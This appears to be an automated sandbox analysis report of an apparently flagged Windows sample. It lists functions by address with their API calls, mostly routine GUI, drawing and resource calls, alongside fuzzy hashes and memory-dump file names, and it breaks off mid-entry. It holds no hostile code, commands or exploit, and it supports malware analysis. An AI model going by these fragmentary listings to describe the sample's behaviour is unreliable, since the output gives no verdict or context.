Opcode Fuzzy Hash: 6c63063e2e5eee8dfafdc881bbc342563f692dbc7f028f79ea7fde62c3ce29f9
Instruction Fuzzy Hash: BBD0A7BAA943544BFB00BBE47CC061123ECB390300B80C929748956182CB74C413FBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02A0D52C Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 02A0D6AB
MulDiv.KERNEL32(?,?,?), ref: 02A0D6E6

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0aac24346f17d56c05be26f0d77f7ec5981fa40d4c726fd25a7dc9f24c2bd9
Instruction ID: 7c2b27c1c5cc0b004c37db61052c9ceb41ec8de4ef078c2e0337aaec0e5d38f8
Opcode Fuzzy Hash: 4a0aac24346f17d56c05be26f0d77f7ec5981fa40d4c726fd25a7dc9f24c2bd9
Instruction Fuzzy Hash: 13D16876A04A09DFDB11CFA8C4C4BAABBF6FF49300F148959E45A9B395CB30E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A080E0 Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02A08155
GetDesktopWindow.USER32 ref: 02A08285
SetCursor.USER32(00000000), ref: 02A082DA

Part of subcall function 02A13C30: ImageList_EndDrag.COMCTL32(?,-00000010,02A082B5), ref: 02A13C4C

SetCursor.USER32(00000000), ref: 02A082C5

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CursorDesktopWindow$DragImageList_
String ID:
API String ID: 617806055-0
Opcode ID: 1bdd4767b87347b1074dedf747a919fc1f7b8416dc3030de6393e235d66e50b8
Instruction ID: 953c95a8ed789a3b95055edf4d3b8bec26bd10f76b7b6297f732b8f6ee9bd51d
Opcode Fuzzy Hash: 1bdd4767b87347b1074dedf747a919fc1f7b8416dc3030de6393e235d66e50b8
Instruction Fuzzy Hash: 99914C38A80641CFC704EF28E2CCA557BE2BB99344F058994E844AB396CF78EC56DF45

Uniqueness

Uniqueness Score: -1.00%

Function 029DF554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029DF603
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029DF61F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029DF696
VariantClear.OLEAUT32(?), ref: 029DF6BF

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 8a3cbed545efa40f5207b8c7f209cd7af2ade8115c3ed9c0ac1bbb4c9e6404de
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 22411879A0162D9FCB61EF58CC91BD9B3BDAF48340F4081D5E54AE7611DA34AF809F60

Uniqueness

Uniqueness Score: -1.00%

Function 029DBE3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 893bd0ddfa32acb3f5d7051fefe6e5051721ccb79c6bb2c0692d7f392b167f6d
Instruction ID: 23ad034f84a456781e9d2981941a40bbc3933b5672f98e8625224cc5a3af99d3
Opcode Fuzzy Hash: 893bd0ddfa32acb3f5d7051fefe6e5051721ccb79c6bb2c0692d7f392b167f6d
Instruction Fuzzy Hash: 3E412F70A002589BDB21EB68CC84BDEB7FDAB58304F4184EAE548E7251DB749F84DF64

Uniqueness

Uniqueness Score: -1.00%

Function 02A0FAFD Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(00000000,?), ref: 02A0FBA4
SaveDC.GDI32(00000000), ref: 02A0FBC7
IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 02A0FC07
RestoreDC.GDI32(00000000,00000000), ref: 02A0FC33
CreateSolidBrush.GDI32(00000000), ref: 02A0FCCC
FrameRect.USER32(00000000,?,00000000), ref: 02A0FCFA
DeleteObject.GDI32(00000000), ref: 02A0FD00
CreateSolidBrush.GDI32(00000000), ref: 02A0FD10
FrameRect.USER32(00000000,?,00000000), ref: 02A0FD3E
DeleteObject.GDI32(00000000), ref: 02A0FD44

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 14353d01d94bebfda322915ec6a09c1c493d0961814be02524827aeb1581746e
Instruction ID: cb16b20e793ce020b224db047fddae30bb3df360cf50aa5dedf839835f43ab98
Opcode Fuzzy Hash: 14353d01d94bebfda322915ec6a09c1c493d0961814be02524827aeb1581746e
Instruction Fuzzy Hash: 1341D774A002499FDB14DFA8D8C5FAEBBF5AF49314F054094EA40EB6A1CB35E984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029DBE3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 54cba473ec7cee5993182b8e80f0e596d09da5d5c91c82c6be8e4df85944477a
Instruction ID: 13598cc8217e80437f64bf6fd22cfaa1b3cb46dc56c6161f1f9ba748bea8c756
Opcode Fuzzy Hash: 54cba473ec7cee5993182b8e80f0e596d09da5d5c91c82c6be8e4df85944477a
Instruction Fuzzy Hash: FB415E70A002589BDB21EBA8CC84BDEB7FDAB58304F4184E9E508E7251DB749F84DF64

Uniqueness

Uniqueness Score: -1.00%

Function 02A21538 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 02A2157D
GetDC.USER32(00000000), ref: 02A215D2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02A215DC
ReleaseDC.USER32(00000000,00000000), ref: 02A215E7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: 6bc59b20416356819923df75c6ac041cf3dc77d8f70b6c6ba94f01f0e9b1978e
Instruction ID: 01406d88b6d5101692df6e4dca5adefe79174094e3976fddcc7144107926755f
Opcode Fuzzy Hash: 6bc59b20416356819923df75c6ac041cf3dc77d8f70b6c6ba94f01f0e9b1978e
Instruction Fuzzy Hash: F531F570A442418FD780EF6CD9C4B997BE6BB44318F4990B9E908CF356EB329848DF65

Uniqueness

Uniqueness Score: -1.00%

Function 029F4CBC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 029F2E8C: EnterCriticalSection.KERNEL32(02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2E94
Part of subcall function 029F2E8C: LeaveCriticalSection.KERNEL32(02A6A3A0,02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2EA1
Part of subcall function 029F2E8C: EnterCriticalSection.KERNEL32(00000038,02A6A3A0,02A6A3A0,00000000,029F183E,00000000,029F189D), ref: 029F2EAA

Part of subcall function 029F614C: GetDC.USER32(00000000), ref: 029F61A2
Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
Part of subcall function 029F614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
Part of subcall function 029F614C: ReleaseDC.USER32(00000000,00000000), ref: 029F61F0

CreateCompatibleDC.GDI32(00000000), ref: 029F4D11
SelectObject.GDI32(00000000,?), ref: 029F4D2A
SelectPalette.GDI32(00000000,?,000000FF), ref: 029F4D53
RealizePalette.GDI32(00000000), ref: 029F4D5F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: d1c147bc84ad60cceedd9eb37edc67e0545d77a5cdb18b51c319e0f526497dd5
Instruction ID: cce73b6c6590c30aed39d5d856b852ae6ac7671d25b5edace5e4adb9b2f5dd5c
Opcode Fuzzy Hash: d1c147bc84ad60cceedd9eb37edc67e0545d77a5cdb18b51c319e0f526497dd5
Instruction Fuzzy Hash: EC31F835A00614EFD794EB59D980D5EB3FAFF89320B2245A5EA049B362D730EE41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A03B5C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32(?,?,?), ref: 02A03B7F
GetSubMenu.USER32(?,?), ref: 02A03B8A
GetMenuItemID.USER32(?,?), ref: 02A03BA3
GetMenuStringA.USER32(?,?,?,?,?), ref: 02A03BF6

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction ID: 12a8ea70f489552a037921e79ea8a07c4432ae7dc37fb34d389d8940f2b37ba5
Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction Fuzzy Hash: 6B114F31601214AFCB00EF6DDCC4EAF77E9AF8A354B1084A9F919D7290DA309D01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 029ED6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 029ED6EF
GetCurrentThreadId.KERNEL32 ref: 029ED6FE
EnterCriticalSection.KERNEL32(02A6A2EC), ref: 029ED743
InterlockedExchange.KERNEL32(02A3AAF0,?), ref: 029ED75F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: 6ed72101a785511a9d6a112df832393b530c09b30b49dc4f2a5656512b17176b
Instruction ID: 38973543de491a1a396a380ecd2f2478856fd3a33edd73f6a24d6e92396d7c39
Opcode Fuzzy Hash: 6ed72101a785511a9d6a112df832393b530c09b30b49dc4f2a5656512b17176b
Instruction Fuzzy Hash: 0321DE70A04244BFEF02DFA8C881B69B7FDEB45B04F41C8A0E402D6691D7769980CF31

Uniqueness

Uniqueness Score: -1.00%

Function 02A22D14 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_00052CA4), ref: 02A22D49
GetWindow.USER32(00000003,00000003), ref: 02A22D61
GetWindowLongA.USER32(00000000,000000EC), ref: 02A22D6E
SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 02A22DAD

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 1c48f8ec7895bc3154339d6d7d4a571e2ac324249297b899fcf1e1fc8b138b94
Instruction ID: 49f5bcebc9fe2414575f65808a6171a76330c3669824a4116bf609fe22d76f3e
Opcode Fuzzy Hash: 1c48f8ec7895bc3154339d6d7d4a571e2ac324249297b899fcf1e1fc8b138b94
Instruction Fuzzy Hash: 1C115A30644720AFEB20AB6CCCC4F99B79AEF45724F544265FD98AB2D2C7709845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02A0A024 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 02A0A039
MulDiv.KERNEL32(?), ref: 02A0A056
MulDiv.KERNEL32(?), ref: 02A0A073
MulDiv.KERNEL32(?), ref: 02A0A090

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction ID: 0c8c682cea9a29ace4f04e42b397fcf3ea099448f359b7cd0d1904192bd29409
Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction Fuzzy Hash: 7001EC6070530C2B8774BE266CC4F6B3A5EDFC5750B10807C692D8B387DE69DC05CA68

Uniqueness

Uniqueness Score: -1.00%

Function 029EA27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 029EA293
LoadResource.KERNEL32(?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000,?), ref: 029EA2AD
SizeofResource.KERNEL32(?,029EA318,?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000,?), ref: 029EA2C7
LockResource.KERNEL32(029E9E88,00000000,?,029EA318,?,029EA318,?,?,?,029E5D70,?,00000001,00000000,?,029EA1BE,00000000), ref: 029EA2D1

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction ID: bb1d236e224fe32d96e65d422df48ae835d9217a1f2cafbf4ed2325bd2239f81
Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
Instruction Fuzzy Hash: 9AF08CB32042046F5B4AEF6CA880E6B77EDEEC8360320801AF90CCB305DA35ED019B74

Uniqueness

Uniqueness Score: -1.00%

Function 02A07F28 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 02A07F35
GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,02A07FA0,-000000F7,?,00000000,02A07B5A,?,-00000010,?), ref: 02A07F3E
GlobalFindAtomA.KERNEL32(00000000), ref: 02A07F53
GetPropA.USER32(00000000,00000000), ref: 02A07F6A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 9ca88e312e7f72a549a85d855e27975b8896ecf11bde05d3092e33d6c7b9397a
Instruction ID: 77298fa2db1724e973e52758ab82f8a98af4ac1e4b7b9724f17d16c2cbb79f96
Opcode Fuzzy Hash: 9ca88e312e7f72a549a85d855e27975b8896ecf11bde05d3092e33d6c7b9397a
Instruction Fuzzy Hash: 8BF05D652021222793207BB4BEC08BFA28CAE807543008823FC40C3191DF28FC82E9B2

Uniqueness

Uniqueness Score: -1.00%

Function 02A06FC8 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?), ref: 02A06FD5
GetCurrentProcessId.KERNEL32(?,00000000,?,02A03C39,?,02A02CF5), ref: 02A06FDE
GlobalFindAtomA.KERNEL32(00000000), ref: 02A06FF3
GetPropA.USER32(?,00000000), ref: 02A0700A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 0ece9d76f3446d676dcd6397174f574d8b8846cad8e542e8c351fbd3248f5cc1
Instruction ID: ed989c92cc13dde9adfea4560b7a6d1ecc2652771aa7b11a162deab4f67348c4
Opcode Fuzzy Hash: 0ece9d76f3446d676dcd6397174f574d8b8846cad8e542e8c351fbd3248f5cc1
Instruction Fuzzy Hash: CEF0E555740120A69B30BFF47CC0C7BB68D8A447A03004E71FD42D7242DF35EC42AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02A224FC Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02A22514
SetWindowsHookExA.USER32(00000003,02A224B8,00000000,00000000), ref: 02A22524
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A2253F
CreateThread.KERNEL32(00000000,000003E8,02A2245C,00000000,00000000), ref: 02A22563

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 5a0a4af3887cfb8c6437333ff0b921ca724b304068aa838b2b8af52f1c91a505
Instruction ID: eabda69663a0924a6c1c52d882f205e909ba22dc65ac587a6dd30e96521ab80a
Opcode Fuzzy Hash: 5a0a4af3887cfb8c6437333ff0b921ca724b304068aa838b2b8af52f1c91a505
Instruction Fuzzy Hash: AEF05E70EC0310FEF720AB28AC7AF2536A9E300B06F10C815FA00BA0C2CFB4509A8E15

Uniqueness

Uniqueness Score: -1.00%

Function 029F7618 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 029F7621
SelectObject.GDI32(00000000,058A00B4), ref: 029F7633
GetTextMetricsA.GDI32(00000000), ref: 029F763E
ReleaseDC.USER32(00000000,00000000), ref: 029F764F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 1bdad9fe24281ba3bf20013684aa38d0675e2e4a7d4c6800ba91628bcb4a5432
Instruction ID: be9582da4b754445453434a1e3c5d81db51fbb3abe3854a282a6fb6d6835181b
Opcode Fuzzy Hash: 1bdad9fe24281ba3bf20013684aa38d0675e2e4a7d4c6800ba91628bcb4a5432
Instruction Fuzzy Hash: F5E0865164357122D69132E96C81BEB7A4D4F426A5F0C1562FE449A3C1DB05C901A7F7

Uniqueness

Uniqueness Score: -1.00%

Function 029F21F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 029F14D8: EnterCriticalSection.KERNEL32(?,029F1515), ref: 029F14DC

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,029F23EC,?,00000000,029F2414), ref: 029F2327
CreateFontIndirectA.GDI32(?), ref: 029F23C9

Strings

Default, xrefs: 029F22EE, 029F22FC, 029F22FD

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: 1a5c93d6f573f8e93a36ba00c1b4fdb7d67d3dd42c4ebc53b665d43fb8556e29
Instruction ID: 107c4a4d464ce52a8be73c03b2828911338354935b3754668b4f1e86c589a889
Opcode Fuzzy Hash: 1a5c93d6f573f8e93a36ba00c1b4fdb7d67d3dd42c4ebc53b665d43fb8556e29
Instruction Fuzzy Hash: 4D61AD70E04248DFDB85DFA8C440BDDBBFAAF89704F1884A5E944AB252C7B09E45DB64

Uniqueness

Uniqueness Score: -1.00%

Function 029D1D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1c2eab6bc7babd8a6cc7a5fa2d4b08e078f54b114cc54bb75a4dda7081a0c3
